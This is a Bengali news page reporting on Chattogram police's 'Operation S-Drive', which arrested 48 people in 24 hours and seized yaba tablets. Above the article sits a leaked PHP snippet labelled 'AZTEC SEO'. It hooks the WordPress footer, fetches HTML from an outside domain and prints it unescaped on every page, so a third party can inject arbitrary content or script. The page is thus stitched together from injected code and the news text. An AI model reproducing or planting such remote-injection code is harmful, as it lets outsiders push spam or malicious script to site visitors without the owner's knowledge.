/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সিএমপির ‘অপারেশন এস-ড্রাইভ’, ২৪ ঘণ্টায় গ্রেফতার ৪৮ | Dhaka Sky News

প্রথম অধিবেশনে সংস্কার পরিষদ গঠিত না হলে রাস্তায় নামতে হবে: নাহিদ

আগের সংবাদ

ইরানের নতুন সর্বোচ্চ নেতা নিয়ে খুশি নন ট্রাম্প

পরের সংবাদ

সিএমপির ‘অপারেশন এস-ড্রাইভ’, ২৪ ঘণ্টায় গ্রেফতার ৪৮

চট্টগ্রাম ব্যুরো

প্রকাশিত: March 9, 2026 , 5:54 pm

চট্টগ্রাম মেট্রোপলিটন পুলিশের অপারেশন ‘এস- ড্রাইভের’ ৮ম দিনে ৯ কিশোর গ্যাংয়ের সদস্যসহ ৪৮ জনকে গ্রেফতার করা হয়েছে। এতে উদ্ধার করা হয়েছে ১ হাজার ৬৪৭ পিস ইয়াবা ট্যাবলেট।
রোববার (৮ মার্চ) দুপুর থেকে সোমবার দুপুর পর্যন্ত নগরীর ১৬টি স্থানে অভিযান চালিয়ে তাদের গ্রেফতার করা হয়।
সোমবার সিএমপির গণসংযোগ শাখা থেকে পাঠানো এক প্রেস বিজ্ঞপ্তিতে এসব তথ্য জানা গেছে।
উল্লেখ্য, গত রোববার রাত ১২টা থেকে নগরীকে ১০ ভাগে বিভক্ত করে এ অভিযান পরিচালনা করা হচ্ছে।
সিএমপির কর্মকর্তারা জানান, অপারেশ এস-ড্রাইভে সোমবার দুপুর ১২টা পর্যন্ত বিভিন্ন অভিযোগে ৪৮ জনকে গ্রেফতার করা হয়েছে। তাদের মধ্যে ছিনতাইকারী ১৭ জন, চাঁদাবাজ ২, মাদক ব্যবসায়ী ৮, জুয়াড়ি ১২ ও কিশোর গ্যাংয়ের সদস্য ৯ জন।
গ্রেফতারদের আদালতে চালান দেওয়া হয়েছে বলে সিএমপি জনসংযোগ শাখা নিশ্চিত করেছেন।
সিএমপির সিনিয়র সহকারী কমিশনার (গণসংযোগ) আমিনুর রশীদ যুগান্তরকে বলেন, গত ২৪ ঘণ্টায় ছিনতাইকারী, চাঁদাবাজ ও কিশোর গ্যাংসহ ৪৮ জনকে গ্রেফতার করা হয়েছে। তাদের বিরুদ্ধে মামলা দায়ের করে আদালতে চালান দেওয়া হয়েছে।